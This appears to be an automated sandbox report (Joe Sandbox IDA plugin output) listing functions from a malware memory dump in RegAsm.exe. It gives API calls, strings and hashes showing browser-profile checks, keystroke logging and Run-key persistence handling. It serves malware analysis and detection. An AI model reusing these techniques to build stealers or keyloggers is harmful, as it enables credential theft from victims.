                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$BufferHeaderPrepare
                                  • String ID: XMG
                                  • API String ID: 2315374483-813777761
                                  • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                  • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                  Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocaleValid
                                  • String ID: IsValidLocaleName$kKD
                                  • API String ID: 1901932003-3269126172
                                  • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                  • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                  Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                  • API String ID: 1174141254-4188645398
                                  • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                  • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                  Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                  • API String ID: 1174141254-2800177040
                                  • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                  • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                  Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: AppData$\Opera Software\Opera Stable\
                                  • API String ID: 1174141254-1629609700
                                  • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                  • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                  Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                  • String ID: [AltL]$[AltR]
                                  • API String ID: 2738857842-2658077756
                                  • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                  • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                  Function 004489D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$FileSystem
                                  • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                  • API String ID: 2086374402-949981407
                                  • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                  • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                  • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                  • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                  Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell
                                  • String ID: !D@$open
                                  • API String ID: 587946157-1586967515
                                  • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                  • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                  Function 004555CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___initconout.LIBCMT ref: 004555DB
                                    • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                  • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleCreateFileWrite___initconout
                                  • String ID: PkGNG
                                  • API String ID: 3087715906-263838557
                                  • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                  • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                  • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                  • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                  Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: State
                                  • String ID: [CtrlL]$[CtrlR]
                                  • API String ID: 1649606143-2446555240
                                  • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                  • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                  Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Init_thread_footer__onexit
                                  • String ID: ,kG$0kG
                                  • API String ID: 1881088180-2015055088
                                  • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                  • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                  Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteOpenValue
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                  • API String ID: 2654517830-1051519024
                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                  Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                  • GetLastError.KERNEL32 ref: 00440D85
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                  • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                  Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastRead
                                  • String ID:
                                  • API String ID: 4100373531-0
                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99